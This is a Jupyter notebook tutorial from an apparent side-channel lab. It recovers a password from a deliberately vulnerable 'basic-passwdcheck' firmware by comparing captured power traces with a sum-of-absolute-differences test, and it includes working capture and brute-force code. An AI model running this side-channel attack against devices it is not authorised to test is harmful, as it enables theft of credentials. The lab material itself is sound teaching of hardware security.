# Attack Password with Timing Analysis II (SAD)

In [ ]:
%run '../helper_scripts/Metadata.ipynb'
print_metadata()

<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Basic-Setup" data-toc-modified-id="Basic-Setup-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Basic Setup</a></span></li><li><span><a href="#Helper-Functions-for-Password-Attack" data-toc-modified-id="Helper-Functions-for-Password-Attack-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Helper Functions for Password Attack</a></span></li><li><span><a href="#The-sum-of-absolute-differences" data-toc-modified-id="The-sum-of-absolute-differences-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>The sum of absolute differences</a></span></li><li><span><a href="#SAD-password-attack" data-toc-modified-id="SAD-password-attack-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>SAD password attack</a></span></li><li><span><a href="#Disconnect" data-toc-modified-id="Disconnect-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>Disconnect</a></span></li></ul></div>

The last example showed how to attack the password by inspecting and analysing captured traces. In this example we'll see how it is possible to break the password without any detailed look at captured traces.

## Basic Setup

Define Variables

In [ ]:
%run "../helper_scripts/Init.ipynb"

Build target and upload

In [ ]:
TARGET = 'basic-passwdcheck'
%store TARGET
%run "$HELPERSCRIPTS/Prepare.ipynb"

Import helper functions

In [ ]:
%run "$HELPERSCRIPTS/Setup_Generic.ipynb"

In [ ]:
scope.adc.samples = 2000

## Helper Functions for Password Attack

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool, Label

output_notebook()

In [ ]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

## The sum of absolute differences
In this example we want to see how a technique called SAD (sum of absolute differences) is useful to auto-detect whether a character was correct or not.
Given two traces $t_1, t_2$ their SAD value is defined as:
$$\text{SAD}(t_1, t_2) := \sum_i \big| t_1[i] - t_2[i] \big|,$$
where $t[i]$ is the value of trace $t$ at point $i$.

In [ ]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

It is of course not obvious why this helps us distinguishing right and wrong password characters. But, it becomes clear with the following example capture:

In [ ]:
outputbuf = ""
trace1, _ = cap_pass_trace('a\n', False)
trace2, _ = cap_pass_trace('b\n', False)
trace3, _ = cap_pass_trace('i\n', False)
p = figure(height=200)
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with SAD = {:.2f}'.format(sad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with SAD = {:.2f}'.format(sad(trace1, trace3)))
show(p)

Now it is clear how to proceed:

## SAD password attack

1. Start capturing a wrong character. Let's call this `base_trace`
2. Capture further characters and calculate the SAD between this and `base_trace`. If the SAD is greater than a certain value we can be sure that we found the right character.
3. Start from beginning incorporating the found right character.

In [ ]:
def sad_attack(check_level=50):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    password = ''
    outputbuf = ''

    while 'Welcome' not in outputbuf:
        # Capture base_trace with definitly wrong next character
        base_trace, _ = cap_pass_trace(password + ' ' + '\n')

        for c in trylist:
            # Try character
            trace, outputbuf = cap_pass_trace(password + c + '\n')
            # Check if c is correct
            if sad(base_trace, trace) > check_level:
                print("Success: " + c)
                password += c
                break

    print('Successfully broken password: ' + password)
    
sad_attack()

## Disconnect

In [ ]:
scope.dis()
target.dis()